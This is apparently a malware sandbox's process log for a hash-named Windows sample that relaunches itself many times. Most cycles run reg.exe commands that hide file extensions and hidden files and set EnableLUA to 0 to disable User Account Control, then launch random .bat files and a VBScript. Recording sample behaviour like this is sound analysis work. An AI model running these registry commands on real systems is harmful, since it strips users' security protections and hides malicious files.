C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iUIkwQEo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ciMAkcYk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\kegggQos.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-889792155-22352944-14318574521849549300-193098601418762819564400872771662604915"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IyoskIMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\nEUYEcYY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-8356572851737083676-553080150-865838722-289085357-6554794141125087206-2096936540"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\biAAosIo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-175029257-494530956-1689006027-111651272-12534062191834863706-1643781308-829071450"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DQscwMMA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JkssYwgQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "59999687420859386711794014904878821408-8654199651125802841-947256953-1149455641"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-239290127294818250-591828114-1199054742-16170107712127489858-530367467862633738"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uSMcYowI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "5231830861206300148296010046123737901692976290-103152939-1186453371-1195890439"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GoYgMsMU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iwkYMEMw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1397410998-452574074283940505149179424211773734281899517239-1261525213834832866"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZcIUYUUw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\rIAMAccI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "2028725122752435165276583696114929501015958134341577823000-1530691802927902092"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZyIcUMcI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-929043516-1541777163-1691134539-434295233-6521340781779287521896365605-1274709824"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QwAUkwsA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "9630034101188884700-929702436-1959189090-1111449273-72338353820389246451172867991"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gKAEAcUU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1552002492-1304379883-1859931463-376606024917772597635128455-333506462630586553"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "597072559-33919362211841098444056587497656992591371053768-1800735143-2054992817"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cSYogAIs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gUYsoYQc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1985729524-835445459-583205538-7274497641107066562-1372715323-425262637-1762804913"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LUYosYcQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-127589827-858645630-1624350009-1619904254-599176506105950975912758718201565754165"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "169349426864754629818273259821222083860-1650822325-155973531-1199579469-885364986"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JYcYAYEU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1694044765-6891120412976818181467533841-969713469-190585099912666426061372012205"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "6052215931957945482-314004617-4259453302114216962647923910443998954-154523009"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1497812969-5148095439803126331600507654-9331951201348641780-4555056111169254803"

C:\Windows\SysWOW64\cmd.exe

